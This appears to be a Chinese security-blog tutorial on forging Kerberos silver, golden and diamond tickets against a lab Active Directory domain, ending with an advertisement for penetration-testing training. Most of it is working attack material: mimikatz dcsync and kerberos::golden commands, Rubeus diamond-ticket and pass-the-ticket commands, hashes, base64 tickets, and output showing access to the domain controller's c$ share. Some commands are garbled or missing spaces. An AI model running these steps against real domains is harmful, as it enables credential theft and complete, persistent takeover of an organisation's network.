原理
在Kerberos认证的第5步,Client带着ST和身份认证-3向Server上的某个服务进行请求,Server接收到了Client发送的请求之后,通过自己的ket解密ST,从而获得一个sessionkey,通过解密的sessionkey验证对方的身份,验证成功就可以使Client访问Server上的指定的服务
白银票据伪造的是TGS票据,不需要和域控打交道。白银票据使用要访问服务的hash,而不是krbtgt的hash。需要注意的一点是,伪造的白银票据没有带有有KDC签名的PAC,如果目标主机配置为验证KDCPAC签名,则白银票据将不起作用。白银票据只能访问指定的服务。
需要导出krbtgt的Hash
mimikatzlog "lsadump::dcsync /domain:test.local /user:krbtgt"
找到SID
whoami/user
需要域名称
netconfig workstation
准备
1.域名nami.com
2.域sidS-1-5-21-1332701932-261370409-2888687086-500
3.目标服务器名WIN-A7DM9L6CVHH.nami.com
4.可利用的服务cifs
5.服务账号的NTMLHASH a6f9a989c9fad5637b1e1e941286da19
6.需要伪造的用户名tset
mimikatz.exe"kerberos::golden /domain:nami.com/sid:S-1-5-21-1332701932-261370409-2888687086/target:WIN-A7DM9L6CVHH.nami.com /service:cifs/rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt" "exit"
mimikatz执行结果
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /***Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ /## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com***/
mimikatz(commandline) # kerberos::golden/domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086/target:WIN-A7DM9L6CVHH.nami.com /service:cifs/rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt
User : testa
Domain : nami.com (NAMI)
SID :S-1-5-21-1332701932-261370409-2888687086
User Id : 500
GroupsId : *513 512 520 518 519
ServiceKey:a6f9a989c9fad5637b1e1e941286da19 - rc4_hmac_nt
Service :cifs
Target : WIN-A7DM9L6CVHH.nami.com
Lifetime :2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16
->Ticket : ** Pass The Ticket **
* PAC generated
*PAC signed
* EncTicketPart generated
* EncTicketPartencrypted
* KrbCred generated
Golden ticket for'testa @ nami.com' successfully submitted for currentsession
mimikatz(commandline) # exit
Bye!
查看票据
Rebues.exe klist
Action:List Kerberos Tickets (Current User)
[*] Current LUID :0x67e95
UserName : win7
Domain : NAMI0
LogonId : 0x67e95
UserSID :S-1-5-21-1332701932-261370409-2888687086-1602
AuthenticationPackage : Kerberos
LogonType :Interactive
LogonTime : 2022/7/9 18:51:29
LogonServer : WIN-A7DM9L6CVHH
LogonServerDNSDomain : NAMI.COM
UserPrincipalName :[email protected]
[0] - 0x17 - rc4_hmac
Start/End/MaxRenew: 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/719:2
7:16
Server Name :cifs/WIN-A7DM9L6CVHH.nami.com @ nami.com
Client Name : testa @ nami.com
Flags : pre_authent,renewable, forwardable (40a00000)
访问DC的cifs服务
C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$\ \\WIN-A7DM9L6CVHH.nami.com\c$
驱动器\\WIN-A7DM9L6CVHH.nami.com\c$中的卷没有标签。
卷的序列号是1EDD-1C0F
2022/03/22 22:20 1,345,536 msf.exe
2016/07/16 21:23 <DIR> PerfLogs
2022/03/22 21:05 <DIR> Program Files
2016/07/16 21:23 <DIR> ProgramFiles (x86)
2022/03/22 23:06 7,168shell3.exe
2022/03/22 21:03 <DIR> Users
2022/03/22 23:35 <DIR> Windows
2 个文件 1,352,704字节
5 个目录51,494,420,480可用字节
使用Rebues.exepruge之后就会清空票据
Rubeus.exe purge
[*] Action: Purge Tickets
Luid: 0x0
[+] Tickets successfully purged!
C:\Users\win7.NAMI0\Desktop>dir\\WIN-A7DM9L6CVHH.nami.com\c$
原理
黄金票据伪造的是TGT,在Kerberos认证中的第3步。在身份认证成功之后,AS使用krbtgthash加密TGT票据返回给Client。如果知道了krbtgt用户的密码hash可以直接伪造任意用户的TGT出来,所以就没有与域控制器的AS_REQ和AS_REP进行通信了。
准备
1、域名称nami.com
2、域的SID值S-1-5-21-1332701932-261370409-2888687086-502
3、域的KRBTGT账号的HASH5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37
4、伪造任意用户名testb
执行mimikatz命令,制作黄金票据
mimikatz.exe"kerberos::golden /user:Administrator /domain:nami.com/sid:S-1-5-21-1332701932-261370409-2888687086/aes256:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/ticket:Administrator.kiribi" "exit"
mimikatz执行结果
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /***Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ /## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com***/
mimikatz(commandline) # kerberos::pttAdministrator.kiribi
* File: 'Administrator.kiribi':OK
mimikatz(commandline) # exit
Bye!
mimikatz.exe"kerberos::ptt Administrator.kiribi" "exit"
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /|| | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_||___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.1
Action: List Kerberos Tickets (CurrentUser)
[*] Current LUID : 0x67e95
UserName : win7
Domain : NAMI0
LogonId : 0x67e95
UserSID :S-1-5-21-1332701932-261370409-2888687086-1602
AuthenticationPackage : Kerberos
LogonType :Interactive
LogonTime : 2022/7/9 18:51:29
LogonServer : WIN-A7DM9L6CVHH
LogonServerDNSDomain : NAMI.COM
UserPrincipalName :win7@nami.com
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2022/7/10 20:12:25 ; 2032/7/7 20:12:25 ;2032/7/7 20:12:25
Server Name : krbtgt/nami.com @nami.com
Client Name : Administrator @ nami.com
Flags : pre_authent, initial, renewable, forwardable(40e00000)
[1] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2022/7/10 20:12:42 ; 2022/7/11 6:12:42 ;2022/7/17 20:12:42
Server Name :cifs/WIN-A7DM9L6CVHH.nami.com @ NAMI.COM
Client Name : Administrator @ nami.com
Flags :name_canonicalize, ok_as_delegate, pre_authent, renewable,forwardable (40a50000)
dir\\WIN-A7DM9L6CVHH.nami.com\c$
C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$\ \\WIN-A7DM9L6CVHH.nami.com\c$ 2022/03/22 22:20 1,345,536 msf.exe
驱动器\\WIN-A7DM9L6CVHH.nami.com\c$中的卷没有标签。
卷的序列号是1EDD-1C0F
2016/07/16 21:23 <DIR> PerfLogs
2022/03/22 21:05 <DIR> Program Files
2016/07/16 21:23 <DIR> ProgramFiles (x86)
2022/03/22 23:06 7,168shell3.exe
2022/03/22 21:03 <DIR> Users
2022/03/22 23:35 <DIR> Windows
2
5 个目录51,494,420,480可用字节
原理
黄金票据和钻石票据都需要Krbgtg密钥。黄金票据攻击利用了从头开始伪造TGT,而钻石票据攻击利用了对域控制器请求的真实TGT进行解密和重新加密的能力。
准备
1、域krbtgt的hash
2、当前域用户的账号密码
3、域名
4、域控的名称
假设已经获得了krbtgt
krbtgt: 5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37
使用域用户用户名密码创建一个钻石TGT
Rubeus.exediamond/krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/user:win7 /password:[email protected] /enctype:aes /domain:nami.com/dc:WIN-A7DM9L6CVHH.nami.com /ticketuser:thor /ticketuserid:1104/groups:512
输出结果
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /|| | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_||___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.1
[*] Action: Diamond Ticket
[*] Usingdomain controller: WIN-A7DM9L6CVHH.nami.com (10.0.20.16)
[!]Pre-Authentication required!
[!] AES256 Salt: NAMI.COMwin7
[*]Using aes256_cts_hmac_sha1 hash:052F11E5B96B8E8699FF99E32E6BF2A4005C8B31FDD67DD88F8F9F08EBD65F02
[*]Building AS-REQ (w/ preauth) for: 'nami.com\win7'
[*] Usingdomain controller: 10.0.20.16:88
[+] TGT request successful!
[*]base64(ticket.kirbi):
doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC
oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5lnP9C/TjjQvkCaRG
9YQuorVlVI7ZBcAgFbo7W5Wq2g8P44QYX8G0dtTOwJJ3xkujzCnO4jLtsvvSG35ph0xfxrzof28AYG6K
1qjiyTQZe2h9fBoWHRzf78jGQHc1Z/fMpwbtt0cr76g5ArbTGsW3jgNMoz34pEuxv/39H0TrtpNAw7Ih
FXHCI8gfMrw8H3Vo4fVFsWiHaub5djsBx4g6Yj0WpjLrNeX6tY8ovFNA9E2CLNqL+YVLc+29IwMlz0m/
/b8pE+2KZDzhUWZ19kQjqD8wGs54Zro7jPlOqD51OYGvhllhpuDtOlSk+2+fiZMkb81eYe/3WCyzcWd5
ehn3Ut5IQzelrt2NWM4mZOcXpTEWno1YSC8QhexN4B17y2apILXVHe1u7w1TSG7U1L1ONet5lhW3sObH
huYzPC7k1Sb3OH0rUdv20m75mfgXC51g3yT2FWJlwbetPJl3VRWiiM3grXC3St1BAVFFzynui9197Kad
j8ZsAk3+6kOJvVvzBlGgR1CIXyOUGQH9EJ3fGuqrEBc5t+SjoZhVpCv8S2bbpav1yJYcE6UTDrlGlssj
qHQK3kJMqmDz7iyYS1z7yH7DDDY/UACiIlUG4hvkv2HP5NU9I2ZQzY+5xtSmTW+bxED0tx+nj4XMcJeU
+NUImXb1+dY/Fb6XYZred3OpR16wj4CbB65Zk6ze3naVnqm1z4IKiavi6nqkylwMmmBZaBP5HFTXQGyc
mtec+smV3MmsBUiLCiOz12v2apDvUYS7gYiHZnD819F+u8K4eL8UBxLivt5dM+JzWcZL/x5NGlqvwckc
rW6ARmgEM4PzjZ19LnvkmxlGfVT5P/8Dd5BsGHByHHNu2feM8kwXdxJn5KPXGSxJcRdCqGiLXH4wTo/5
kOKO9QEX0mEfe7R598Y1QAoC4n4VfLC5KhOm3KN5dCEFxynqDYQYOPfyWduAfVre90yxP4S/aKRbHHVn
Rmq+iNzs9fJZavQLFOYnWWIgvsBk6Jm9WUeFqr/SHPnTxzkmblCjFi/H+pZSAg+4VkdjP+VGCIJGhKtF
sxEcquf+JUb2ttARQb1c9OyGTbC7pJfzz7tp33wS21bzXiK3TsJ8NgKT9pBt0qOTqx5DkWXqKu8mpPYJ
iYyxAjpRlaOO/tVY+0JZIF7PKVjT6xsLPlNfq5ocBBPrXrCXSPL8qGDCHUjEKrYgd1Khs/ToEXgmoKpm
vNzAy4XDdIOdzZChpgwbYcS0gZI9YriO6C1xQNkSQgQp5d4MWNF7NVijgdYwgdOgAwIBAKKBywSByH2B
xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCBEtEF4ifDsQ/GCwfhSOUphHOXJjPoaY/hIlQ8VrKL36aEK
GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAEDhAAClERgPMjAyMjA3MTAxMDA5MDJaphEY
DzIwMjIwNzEwMjAwOTAyWqcRGA8yMDIyMDcxNzEwMDkwMlqoChsITkFNSS5DT02pHTAboAMCAQKhFDAS
GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT
[*]Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*]Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC
oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0d
wW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcF
vnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0
JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqs
Px5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmE
dnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJ
r/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRu
snAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9o
KRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ
+oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4Jhqb
daofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpP
IdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdz
U9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOT
paMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfb
Qgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR
1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6L
eTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw
KaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6AD
AgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJa
pxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D
T00=
使用tgt deleg技巧创建钻石TGT:
C:\Rubeus>Rubeus.exe diamond/krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/tgtdeleg /ticketuser:thor /ticketuserid:1104 /groups:512
输出结果
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /|| | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_||___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.1
[*] Action: Diamond Ticket
[*] Notarget SPN specified, attempting to build 'cifs/dc.domain.com'
[*]Initializing Kerberos GSS-API w/ fake delegation for target'cifs/WIN-A7DM9L6CVHH.nami.com'
[+] Kerberos GSS-APIinitialization success!
[+] Delegation requset success! AP-REQdelegation ticket is now in GSS-API output.
[*] Found the AP-REQdelegation ticket in the GSS-API output.
[*] Authenticatoretype: aes256_cts_hmac_sha1
[*] Extracted the service ticketsession key from the ticket cache:BzaMDaTaD6S9eF3ZYpZznQGqHim4GrZNG3N/1zyaubA=
[+] Successfullydecrypted the authenticator
[*] base64(ticket.kirbi):
doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC
oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5pe4JhXrlmSbGCz+w
1O1L1B0XEbFDJUO+8DbnCn3MT6P/tIt38Ly+Zrz8KWnhrRKMOqTfiwAaaQ4F/dhydnmbqEz79zgWf0Ie
Fiu5ictNEUgNy2qR0WO4MOOiRfInPoWGXHs+aJW/rIEjT6y7QudUGhzLToBq3LZvZiI6JRo+Rk4NvPs3
E5S1LeSbwigxtrIgRYXV0O3qG0LMIlEbGzJjj71ZMMQZBoBY9ARCN4KWz6bsLomOqAPsaQzyHpPuoFmQ
Uap5Mf3/p8gSj4zXdRiGz+4R3Mw2av83uos4bY5N4twSX6Tz8vra6hap2weEpaPFQJZrSriBQLpB0+em
Kz2dRMLZU6oJqkZjvNxHtmq9fo3HebvjlXdT8k0Ww4jedFBrN5eQyezK6a55nr4R5IawK4a0wxwnnAmo
J46kusBuqFYe4K/dqmuWAOaPUXIydF8WqlieSJiw5a97c3ZAJ/4AThFZnmO9hBX5GuT4oa+NowW8Vipz
EmdyTZVujVcWnk5wlgvYiSZJP+ooY2B5z09FEZGWJJnnI1SA+yER2Y+vNtJ+vWxNhBYWdOboX137osmO
3LrPHUcVvxDV4n+7ml1BMa0FXiMmxwPptmht1DhV/7CdJBIi68dnnYLIXdLghqeYixlIc8H+gUHUEykg
5lmQ8iDgV9vKOYVI6uk7LERO8DkO6NnAswK4YpA2XGZiSdZqWgUYnNKRMjgF+lPski8pmE8VUQXP2h5t
NBSvQrrivUs/8pAppETkXkLjv3xkIlzgEOwdl3gbcUDpPnGaT41YO/vrwymugRciuzfsMiwspV96Cith
apcBahSxo7AA7PgMab9pOvYBnnxI1z0sPD7QhweXsf3Uwoz3Qy7xPyWZwjqdJ+uTPVvYLJtqahQ2kk2X
sBESFzYlG8brnVDFORM8XaVI2+hCRgGj1uy/+3EPo8v+fMpt1a/jeS1/vfm8IcUBV9HpBVbdLp4SGoui
lp9bWkhr+Bd19CwHJjqZfNBoJqfRd6TEwgKxWtjXWE28rHrqCKrm0brozF8j7EGCmzTZ3MFiQj/faMM2
yRMrlboD/in9fJiKbaXehlpE7qvSbpiANyqabdZRB/C4PAFtbf5a8xP2dmAt2nbKtxh3KLwi7kjgGI//
9vLJEwgx1No06DONFhKlP3WhoJ5VYDPfNSv8PKwYmrSKBGCmeiJ7vgpY+Q5/gtyNAj2j6kyX6B7vOLA7
ZTSskmNjuYAOYRhai6sGtvp0t+DIiSX1S+DYKyyq3aYNDvH6AaGSmpujgdYwgdOgAwIBAKKBywSByH2B
xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCD/fE5Z49iKW+LbijggS7K44DP9DgIy9Rss1PIWjpTKoaEK
GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAGChAAClERgPMjAyMjA3MTAwOTQ1NTBaphEY
DzIwMjIwNzEwMTk0MTUzWqcRGA8yMDIyMDcxNzA5NDE1M1qoChsITkFNSS5DT02pHTAboAMCAQKhFDAS
GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT
[*]Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*]Encrypting Modified TGT
[*] base64(ticket.kirbi):
doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC
oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpSsngeghif/mcTl6M
NYsPa2KZAP96iM+zjJtUi0Un9nK+uWmyWP7/tqurYDMX4UCuvsKlNY+hoU2el5GIntt4MfL0Qtj9805N
qjpb2ta7dhPkptfEtobJXcaWpA1Yh8wExlteZxZDd6GdZN4lncQgRTN43IynDFMR8GiH+L7WcooqVaUm
Lev9kjEnNVBFCAtT3qFhG6qgFdVgz6gg+ByC45QrLI8auJE3aVaKsfiSgm+GHii5v5VoMFT9/4mxfbLn
cfLlpJR6mTDXYSqK/xCVuQeUqhmvE3/4sJ1UdAWWu/2TvuvRWN1TdzxvVW9HXzq8i+pK48MZaym8xBa6
pio1oJ+3ZqoU5UuH+tXXr/z+Iex32TsvJnX5vlUj7mOU1AsiV56axG/To05y15SfTn0eIqE2QBpcfvYs
saqpVkoCHFeENkd36E0akHijmQA1OLJeJA0zkighHtsWnMLdJWUXSI5zZH0lOSsVssJ248OBqIaKOdnf
1bThgMLcvXTvKjxGYoiB+f1t8Catbv9cNqvKbq9/dlSf9nBZMGy60QFZNuqMqgwRrAXpLmiCCxZJtbIE
vR38oJvHbkP75ugfMLsDrw5Ctl04lzRo+Big8Z+SDBUOtuGngnELdgCQqtqh7GiZtaFy4xQupzBqvhrG
2BY3I85IoD++5q8VrtKOI7GfD9GaDUZvjyA+bxfN7EXKJi9eOqt7mkmusz5o54zHgRerhYsQ7k16k14n
ZlsA7ufT97Z1osvGPD7lAcA6b3SohY3IhrUHxwccFRNMLabfSHzT1TYlaT/+yByMA+eulPa9RE8yFDWn
A2dEodb8EW06JWzHpI27R7dCrm6X11QOBT2gWFdMzm2klAjGfJDkD9doBADoqqwdIxwT2aTI32UHjlQd
lsTwtfY0/wzCCAkwKQAAVxf93avCYDXh2y75Rcp5MvkCJJu3Z2SoYWRgYk2M3JcMTWGAyZJCPx8mQShF
nkdgNGgnA2+ISVMUOMZsREv2ev8Jslzl4ii+Xqnwl1+fNYcMjdhBZmY2hYNENpTpxC/nBQcNftPeDniC
vOwR7lRTE+tW39ylVRWlYV5y6SPyslVYWE+PfRauGcOAmZZmJNYJUCNjs3c9560zqKQEjBXQtyWJXXrq
y7HZ+SFD95caxYK9cJp2YZLkjIEKUwxCjHcHvj1cA6Hy3TJTAgvxoxpPrYCDyRhG8OZ4RilZ8h7aOxMR
94mtBxnQNFbDAax1I6IHhWrc/D0pXZhvaaOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw
KaADAgESoSIEIP98Tlnj2Ipb4tuKOCBLsrjgM/0OAjL1GyzU8haOlMqhoQobCE5BTUkuQ09NohEwD6AD
AgEBoQgwBhsEdGhvcqMHAwUAYKEAAKURGA8yMDIyMDcxMDA5NDU1MFqmERgPMjAyMjA3MTAxOTQxNTNa
pxEYDzIwMjIwNzE3MDk0MTUzWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D
T00=
ptt导入票据
Rubeus.exeptt/ticket:doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0dwW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcFvnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqsPx5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmEdnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJr/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRusnAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9oKRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ+oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4JhqbdaofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpPIdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdzU9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOTpaMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfbQgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6LeTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCswKaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6ADAgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJapxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5DT00=
输出结果
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /|| | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_||___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.1
Action: List Kerberos Tickets (CurrentUser)
[*] Current LUID : 0x67e95
UserName : win7
Domain : NAMI0
LogonId : 0x67e95
UserSID :S-1-5-21-1332701932-261370409-2888687086-1602
AuthenticationPackage : Kerberos
LogonType :Interactive
LogonTime : 2022/7/9 18:51:29
LogonServer : WIN-A7DM9L6CVHH
LogonServerDNSDomain : NAMI.COM
UserPrincipalName :win7@nami.com
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ;2022/7/17 18:09:02
Server Name : krbtgt/NAMI.COM @NAMI.COM
Client Name : thor @ NAMI.COM
Flags : name_canonicalize, pre_authent, initial,renewable, forwardable (40e10000)
查看票据
Action:List Kerberos Tickets (Current User)
[*] Current LUID :0x67e95
UserName : win7
Domain : NAMI0
LogonId : 0x67e95
UserSID :S-1-5-21-1332701932-261370409-2888687086-1602
AuthenticationPackage : Kerberos
LogonType :Interactive
LogonTime : 2022/7/9 18:51:29
LogonServer : WIN-A7DM9L6CVHH
LogonServerDNSDomain : NAMI.COM
UserPrincipalName :[email protected]
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ;2022/7/17 18:
09:02
Server Name :krbtgt/NAMI.COM @ NAMI.COM
Client Name : thor @NAMI.COM
Flags : name_canonicalize,pre_authent, initial, renewable, fo
rwardable (40e10000)
再次访问域控制器
C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$\ \\WIN-A7DM9L6CVHH.nami.com\c$ 2022/03/22 22:20 1,345,536 msf.exe
驱动器\\WIN-A7DM9L6CVHH.nami.com\c$中的卷没有标签。
卷的序列号是1EDD-1C0F
2016/07/16 21:23 <DIR> PerfLogs
2022/03/22 21:05 <DIR> Program Files
2016/07/16 21:23 <DIR> ProgramFiles (x86)
2022/03/22 23:06 7,168shell3.exe
2022/03/22 21:03 <DIR> Users
2022/03/22 23:35 <DIR> Windows
2
5 个目录51,494,420,480可用字节
清除票据
C:\Users\win7.NAMI0\Desktop>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___| | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.1
Action:List Kerberos Tickets (Current User)
[*] Current LUID :0x67e95
再次访问域控制器
C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$
拒绝访问。
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
渗透培训
需要渗透测试培训联系暗月